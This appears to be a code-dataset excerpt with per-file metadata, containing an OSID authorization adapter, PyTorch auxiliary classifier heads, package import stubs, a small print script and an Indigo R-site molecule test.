def acknowledge_sequence_rule_enabler_notification(self, notification_id):
raise Unimplemented()
def register_for_new_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_new_sequence_rule_enablers()
def register_for_changed_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_sequence_rule_enablers()
@raise_null_argument
def register_for_changed_sequence_rule_enabler(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_sequence_rule_enabler(sequence_rule_enabler_id)
def register_for_deleted_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_sequence_rule_enablers()
@raise_null_argument
def register_for_deleted_sequence_rule_enabler(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_sequence_rule_enabler(sequence_rule_enabler_id)
def reliable_sequence_rule_enabler_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.reliable_sequence_rule_enabler_notifications()
def unreliable_sequence_rule_enabler_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.unreliable_sequence_rule_enabler_notifications()
@raise_null_argument
def acknowledge_sequence_rule_enabler_notification(self, notification_id):
raise Unimplemented()
class SequenceRuleEnablerBankSession(abc_assessment_authoring_sessions.SequenceRuleEnablerBankSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerBankSession methodswith authorization checks."""
def can_lookup_sequence_rule_enabler_bank_mappings(self):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
return self._can('lookup')
def use_comparative_sequence_rule_enabler_bank_view(self):
# Implemented from azosid template for -
# osid.resource.BinLookupSession.use_comparative_bin_view_template
self._provider_session.use_comparative_sequence_rule_enabler_bank_view()
def use_plenary_sequence_rule_enabler_bank_view(self):
# Implemented from azosid template for -
# osid.resource.BinLookupSession.use_plenary_bin_view_template
self._provider_session.use_plenary_sequence_rule_enabler_bank_view()
@raise_null_argument
def get_sequence_rule_enabler_ids_by_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enabler_ids_by_bank(bank_id)
@raise_null_argument
def get_sequence_rule_enablers_by_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resources_by_bin_template
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enablers_by_bank(bank_id)
@raise_null_argument
def get_sequence_rule_enabler_ids_by_banks(self, bank_ids):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resource_ids_by_bins
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enabler_ids_by_banks(bank_ids)
@raise_null_argument
def get_sequence_rule_enablers_by_banks(self, bank_ids):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resources_by_bins
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enablers_by_banks(bank_ids)
@raise_null_argument
def get_bank_ids_by_sequence_rule_enabler(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_bin_ids_by_resource
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_bank_ids_by_sequence_rule_enabler(sequence_rule_enabler_id)
@raise_null_argument
def get_banks_by_sequence_rule_enabler(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_bins_by_resource
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_banks_by_sequence_rule_enabler(sequence_rule_enabler_id)
class SequenceRuleEnablerBankAssignmentSession(abc_assessment_authoring_sessions.SequenceRuleEnablerBankAssignmentSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerBankAssignmentSession methodswith authorization checks."""
def can_assign_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.can_assign_resources
return self._can('assign')
@raise_null_argument
def can_assign_sequence_rule_enablers_to_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
return self._can('assign', qualifier_id=bank_id)
@raise_null_argument
def get_assignable_bank_ids(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.get_assignable_bank_ids(bank_id)
@raise_null_argument
def get_assignable_bank_ids_for_sequence_rule_enabler(self, bank_id, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.get_assignable_bank_ids_for_sequence_rule_enabler(bank_id, sequence_rule_enabler_id)
@raise_null_argument
def assign_sequence_rule_enabler_to_bank(self, sequence_rule_enabler_id, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.assign_sequence_rule_enabler_to_bank(sequence_rule_enabler_id, bank_id)
@raise_null_argument
def unassign_sequence_rule_enabler_from_bank(self, sequence_rule_enabler_id, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.unassign_sequence_rule_enabler_from_bank(sequence_rule_enabler_id, bank_id)
class SequenceRuleEnablerSmartBankSession(abc_assessment_authoring_sessions.SequenceRuleEnablerSmartBankSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerSmartBankSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_manage_smart_banks(self):
raise Unimplemented()
def get_sequence_rule_enabler_query(self):
raise Unimplemented()
sequence_rule_enabler_query = property(fget=get_sequence_rule_enabler_query)
def get_sequence_rule_enabler_search_order(self):
raise Unimplemented()
sequence_rule_enabler_search_order = property(fget=get_sequence_rule_enabler_search_order)
@raise_null_argument
def apply_sequence_rule_enabler_query(self, sequence_rule_enabler_query):
raise Unimplemented()
def inspect_sequence_rule_enabler_query(self):
raise Unimplemented()
@raise_null_argument
def apply_sequence_rule_enabler_sequencing(self, sequence_rule_enabler_search_order):
raise Unimplemented()
@raise_null_argument
def get_sequence_rule_enabler_query_from_inspector(self, sequence_rule_enabler_query_inspector):
raise Unimplemented()
class SequenceRuleEnablerRuleLookupSession(abc_assessment_authoring_sessions.SequenceRuleEnablerRuleLookupSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerRuleLookupSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_lookup_sequence_rule_enabler_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return (self._can('lookup') or
bool(self._get_overriding_catalog_ids('lookup')))
def use_comparative_sequence_rule_enabler_rule_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_comparative_resource_view_template
self._use_comparative_object_view()
self._provider_session.use_comparative_sequence_rule_enabler_rule_view()
def use_plenary_sequence_rule_enabler_rule_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_plenary_resource_view_template
self._use_plenary_object_view()
self._provider_session.use_plenary_sequence_rule_enabler_rule_view()
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
@raise_null_argument
def get_sequence_rule_enabler_ids_for_sequence_rule(self, sequence_rule_id):
raise Unimplemented()
@raise_null_argument
def get_sequence_rule_enablers_for_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_for_sequence_rule(sequence_rule_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_rule_query()
query.match_sequence_rule_id(sequence_rule_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_ids_for_sequence_rule_enabler(self, sequence_rule_enabler_id):
raise Unimplemented()
@raise_null_argument
def get_sequence_rules_for_sequence_rule_enabler(self, sequence_rule_enabler_id):
raise Unimplemented()
class SequenceRuleEnablerRuleApplicationSession(abc_assessment_authoring_sessions.SequenceRuleEnablerRuleApplicationSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerRuleApplicationSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_assign_sequence_rule_enablers(self):
raise Unimplemented()
@raise_null_argument
def assign_sequence_rule_enabler_to_sequence_rule(self, sequence_rule_enabler_id, sequence_rule_id):
raise Unimplemented()
@raise_null_argument
def unassign_sequence_rule_enabler_from_sequence_rule(self, sequence_rule_enabler_id, sequence_rule_id):
raise Unimplemented()
def can_sequence_sequence_rule_enablers(self):
raise Unimplemented()
@raise_null_argument
def move_sequence_rule_enabler_ahead(self, sequence_rule_enabler_id, sequence_rule_id, reference_id):
raise Unimplemented()
@raise_null_argument
def move_sequence_rule_enabler_behind(self, sequence_rule_enabler_id, sequence_rule_id, reference_id):
raise Unimplemented()
@raise_null_argument
def order_sequence_rule_enablers(self, sequence_rule_enabler_ids, sequence_rule_id):
raise Unimplemented()
| 46.025088
| 152
| 0.742424
| 13,635
| 117,410
| 5.926073
| 0.020462
| 0.061632
| 0.061075
| 0.084342
| 0.932353
| 0.904594
| 0.882082
| 0.862083
| 0.843766
| 0.821935
| 0
| 0.000126
| 0.191977
| 117,410
| 2,550
| 153
| 46.043137
| 0.851586
| 0.254433
| 0
| 0.720841
| 0
| 0
| 0.025771
| 0.009078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.213512
| false
| 0.002549
| 0.005099
| 0.039516
| 0.424474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
44688f326f03a1557c6029f29e4ffe38f721a4fb
| 59
|
py
|
Python
|
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/numero_oito.py
|
SweydAbdul/estudos-python
|
b052708d0566a0afb9a1c04d035467d45f820879
|
[
"MIT"
] | null | null | null |
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/numero_oito.py
|
SweydAbdul/estudos-python
|
b052708d0566a0afb9a1c04d035467d45f820879
|
[
"MIT"
] | null | null | null |
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/numero_oito.py
|
SweydAbdul/estudos-python
|
b052708d0566a0afb9a1c04d035467d45f820879
|
[
"MIT"
] | null | null | null |
print(4 + 4)
print(10 - 2)
print(2 * 4)
print(int(64 / 8))
| 11.8
| 18
| 0.559322
| 13
| 59
| 2.538462
| 0.538462
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212766
| 0.20339
| 59
| 4
| 19
| 14.75
| 0.489362
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
446c7c17f1c29aeeaa987911b491b3618328c1c4
| 130
|
py
|
Python
|
stable_baselines/sqn/__init__.py
|
createamind/stable-baselines
|
663f2cd71560c53ebe01e41e560386dd9568f50f
|
[
"MIT"
] | 1
|
2020-10-20T06:13:15.000Z
|
2020-10-20T06:13:15.000Z
|
stable_baselines/sqn/__init__.py
|
createamind/stable-baselines
|
663f2cd71560c53ebe01e41e560386dd9568f50f
|
[
"MIT"
] | null | null | null |
stable_baselines/sqn/__init__.py
|
createamind/stable-baselines
|
663f2cd71560c53ebe01e41e560386dd9568f50f
|
[
"MIT"
] | null | null | null |
from stable_baselines.sqn.sqn import SQN
from stable_baselines.sqn.policies import MlpPolicy, CnnPolicy, LnMlpPolicy, LnCnnPolicy
| 43.333333
| 88
| 0.861538
| 17
| 130
| 6.470588
| 0.588235
| 0.181818
| 0.345455
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084615
| 130
| 2
| 89
| 65
| 0.92437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
447e8a8607f28d02f40d426eb5d6aaf8a15c1905
| 2,527
|
py
|
Python
|
extorch/nn/modules/auxiliary.py
|
A-LinCui/Extorch
|
70e2100636c68c803a1e763fbf11d8ede73c0d37
|
[
"MIT"
] | 2
|
2021-09-11T16:09:05.000Z
|
2022-03-05T08:02:05.000Z
|
extorch/nn/modules/auxiliary.py
|
A-LinCui/Extorch
|
70e2100636c68c803a1e763fbf11d8ede73c0d37
|
[
"MIT"
] | null | null | null |
extorch/nn/modules/auxiliary.py
|
A-LinCui/Extorch
|
70e2100636c68c803a1e763fbf11d8ede73c0d37
|
[
"MIT"
] | null | null | null |
from torch import Tensor
import torch.nn as nn
class AuxiliaryHead(nn.Module):
r"""
Auxiliary head for the classification task on CIFAR datasets.
Args:
in_channels (int): Number of channels in the input feature.
num_classes (int): Number of classes.
Examples::
>>> import torch
>>> input = torch.randn((10, 3, 32, 32))
>>> module = AuxiliaryHead(3, 10)
>>> output = module(input)
"""
def __init__(self, in_channels: int, num_classes: int) -> None:
super(AuxiliaryHead, self).__init__()
self.features = nn.Sequential(
nn.ReLU(inplace = True),
nn.AvgPool2d(5, stride = 3, padding = 0, count_include_pad = False),
nn.Conv2d(in_channels, 128, 1, bias = False),
nn.BatchNorm2d(128),
nn.ReLU(inplace = True),
nn.Conv2d(128, 768, 2, bias = False),
nn.BatchNorm2d(768),
nn.ReLU(inplace = True),
nn.AdaptiveAvgPool2d((1, 1))
)
self.classifier = nn.Linear(768, num_classes)
def forward(self, input: Tensor) -> Tensor: #pylint: disable=arguments-differ
output = self.features(input)
output = self.classifier(output.view(output.size(0), -1))
return output
class AuxiliaryHeadImageNet(nn.Module):
r"""
Auxiliary head for the classification task on the ImageNet dataset.
Args:
in_channels (int): Number of channels in the input feature.
num_classes (int): Number of classes.
Examples::
>>> import torch
>>> input = torch.randn(10, 5, 32, 32)
>>> module = AuxiliaryHeadImageNet(5, 10)
>>> output = module(input)
"""
def __init__(self, in_channels: int, num_classes: int) -> None:
super(AuxiliaryHeadImageNet, self).__init__()
self.features = nn.Sequential(
nn.ReLU(inplace = True),
nn.AvgPool2d(5, stride = 2, padding = 0, count_include_pad = False),
nn.Conv2d(in_channels, 128, 1, bias = False),
nn.BatchNorm2d(128),
nn.ReLU(inplace = True),
nn.Conv2d(128, 768, 2, bias = False),
nn.BatchNorm2d(768),
nn.ReLU(inplace = True),
nn.AdaptiveAvgPool2d((1, 1))
)
self.classifier = nn.Linear(768, num_classes)
def forward(self, input: Tensor) -> Tensor:
output = self.features(input)
output = self.classifier(output.view(output.size(0), -1))
return output
| 33.693333
| 81
| 0.58607
| 298
| 2,527
| 4.862416
| 0.251678
| 0.041408
| 0.05383
| 0.070393
| 0.837819
| 0.837819
| 0.837819
| 0.837819
| 0.837819
| 0.837819
| 0
| 0.047991
| 0.290859
| 2,527
| 74
| 82
| 34.148649
| 0.760603
| 0.27226
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
927668ea6f35aedcff25f779e85a8b8c27a8c797
| 191
|
py
|
Python
|
maskrcnn_benchmark/solver/__init__.py
|
witwitchayakarn/6DVNET
|
f13b35162ad90fa49d777f3a41383e9d34eb4820
|
[
"MIT"
] | 295
|
2021-12-08T02:22:27.000Z
|
2022-03-31T22:27:10.000Z
|
maskrcnn_benchmark/solver/__init__.py
|
witwitchayakarn/6DVNET
|
f13b35162ad90fa49d777f3a41383e9d34eb4820
|
[
"MIT"
] | 25
|
2019-08-23T02:19:00.000Z
|
2022-01-08T11:26:56.000Z
|
fcos/core/solver/__init__.py
|
best-of-acrv/fcos
|
47e5624973b256b8c74ce2c00fca50e62c19c66a
|
[
"BSD-3-Clause"
] | 21
|
2019-08-23T02:21:59.000Z
|
2022-02-13T04:08:26.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
from .build import make_optimizer
from .build import make_lr_scheduler
from .lr_scheduler import WarmupMultiStepLR
| 38.2
| 72
| 0.806283
| 26
| 191
| 5.769231
| 0.692308
| 0.12
| 0.2
| 0.253333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141361
| 191
| 4
| 73
| 47.75
| 0.914634
| 0.361257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
92929518fad021d018370af53a9449fbb935ed28
| 7,165
|
py
|
Python
|
api/tests/integration/tests/basic/rsite.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 204
|
2015-11-06T21:34:34.000Z
|
2022-03-30T16:17:01.000Z
|
api/tests/integration/tests/basic/rsite.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 509
|
2015-11-05T13:54:43.000Z
|
2022-03-30T22:15:30.000Z
|
api/tests/integration/tests/basic/rsite.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 89
|
2015-11-17T08:22:54.000Z
|
2022-03-17T04:26:28.000Z
|
import os
import sys
import errno
sys.path.append('../../common')
from env_indigo import *
indigo = Indigo()
indigo.setOption("molfile-saving-skip-date", "1")
if not os.path.exists(joinPathPy("out", __file__)):
try:
os.makedirs(joinPathPy("out", __file__))
except OSError as e:
if e.errno != errno.EEXIST:
raise
saver = indigo.createFileSaver(joinPathPy("out/rsite.sdf", __file__), "sdf")
mol = indigo.loadMolecule("CCNNCN")
mol.addRSite("R")
mol.addRSite("R")
mol.addRSite("R1")
mol.addRSite("")
a3 = mol.addRSite("R3")
print(mol.molfile())
saver.append(mol)
mol.addRSite("R1, R3")
print(mol.molfile())
saver.append(mol)
a3.resetAtom("N")
print(mol.molfile())
saver.append(mol)
a0 = mol.getAtom(0)
a0.setRSite("R4")
print(mol.molfile())
saver.append(mol)
a1 = mol.getAtom(1)
a1.resetAtom("O")
print(mol.molfile())
saver.append(mol)
a1.setRSite("R4")
a1.highlight()
print(mol.molfile())
saver.append(mol)
mol = indigo.loadMolecule("CCNNCN")
print(mol.checkRGroups())
mol.addRSite("R1")
print(mol.checkRGroups())
mol = indigo.loadMolecule('''
Ketcher 12091616232D 1 1.00000 0.00000 0
2 1 0 0 0 999 V2000
13.6750 -5.9750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.5410 -6.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0
M APO 1 2 1
M END
''')
print(mol.checkRGroups())
mol = indigo.loadMolecule('''$MDL REV 1
$MOL
$HDR
$END HDR
$CTAB
2 1 0 0 0 999 V2000
13.6750 -5.9750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.5410 -6.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0
M END
$END CTAB
$RGP
1
$CTAB
2 1 0 0 0 999 V2000
13.3500 -9.9750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.2160 -10.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.checkRGroups())
mol = indigo.loadMolecule('''$MDL REV 1 0209181741
$MOL
$HDR
Mrv0541 02091817412D
$END HDR
$CTAB
6 6 0 0 0 0 999 V2000
0.0000 0.8250 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.7145 0.4125 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
0.7145 -0.4125 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
-0.0000 -0.8250 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.7145 -0.4125 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
-0.7145 0.4125 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
5 6 1 0 0 0 0
1 6 1 0 0 0 0
M LOG 1 1 0 0
M LOG 1 2 0 0
M RGP 2 3 2 6 1
M END
$END CTAB
$RGP
1
$CTAB
1 0 0 0 0 0 999 V2000
3.8966 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$CTAB
1 0 0 0 0 0 999 V2000
6.2538 -2.4750 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$END RGP
$RGP
2
$CTAB
1 0 0 0 0 0 999 V2000
3.8966 -4.9500 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$CTAB
1 0 0 0 0 0 999 V2000
6.2538 -4.9500 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.molfile())
print(mol.smiles())
mol = indigo.loadMolecule('''$MDL REV 1
$MOL
$HDR
$END HDR
$CTAB
8 8 0 0 0 999 V2000
0.1786 1.3406 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
0.1786 0.5156 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.8931 0.1031 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.8931 -0.7219 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.1786 -1.1344 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.5359 -0.7219 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.5359 0.1031 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-1.2503 0.5156 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
5 6 1 0 0 0 0
6 7 1 0 0 0 0
2 7 1 0 0 0 0
7 8 1 0 0 0 0
M RGP 2 1 1 8 2
M LOG 1 2 1 1 0,1
M END
$END CTAB
$RGP
2
$CTAB
1 0 0 0 0 999 V2000
4.0752 -5.2594 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$END RGP
$RGP
1
$CTAB
3 2 0 0 0 999 V2000
4.0752 -2.3719 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
4.7897 -2.7844 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.5042 -2.3719 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.smiles())
mol = indigo.loadMolecule('''$MDL REV 1 0212181244
$MOL
$HDR
Mrv0541 02121812442D
$END HDR
$CTAB
4 3 0 0 0 0 999 V2000
0.4125 0.7145 0.0000 Cl 0 0 0 0 0 0 0 0 0 0 0 0
0.0000 -0.0000 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
0.4125 -0.7145 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-0.8250 -0.0000 0.0000 I 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
2 4 1 0 0 0 0
M LOG 1 1 0 0
M RGP 1 2 1
M END
$END CTAB
$RGP
1
$CTAB
7 6 0 0 0 0 999 V2000
3.8304 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
4.5448 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.2593 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.9738 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.9738 -3.7125 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
6.6882 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
7.4027 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
4 6 1 0 0 0 0
6 7 1 0 0 0 0
M APO 2 5 2 7 1
M END
$END CTAB
$CTAB
7 6 0 0 0 0 999 V2000
10.7100 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
11.4245 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
12.1390 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
12.8535 -2.8875 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
12.8535 -3.7125 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
13.5679 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.2824 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
4 6 1 0 0 0 0
6 7 1 0 0 0 0
M APO 2 5 2 7 1
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.smiles())
m = indigo.loadMolecule("C1O[*]CO[*]1 |$;;_R2;;;_R1$,RG:_R1={C},{N},_R2={C},{N}|")
print(m.molfile())
m = indigo.loadMolecule("[*]C1CCCCC1[*] |$_R1;;;;;;;_R2$,RG:_R1={CCC},_R2={N},LOG={_R1:;;>0._R2:_R1;H;0,1}|")
print(m.molfile())
m = indigo.loadMolecule("|RG:_R1={CCCCCC}|")
print(m.molfile())
| 25.866426
| 109
| 0.470063
| 1,652
| 7,165
| 2.023608
| 0.085351
| 0.39665
| 0.507927
| 0.564762
| 0.736763
| 0.717021
| 0.656596
| 0.591086
| 0.577326
| 0.530362
| 0
| 0.457335
| 0.440614
| 7,165
| 276
| 110
| 25.960145
| 0.376747
| 0
| 0
| 0.611336
| 0
| 0.194332
| 0.801954
| 0.018562
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016194
| 0
| 0.016194
| 0.068826
| 0
| 0
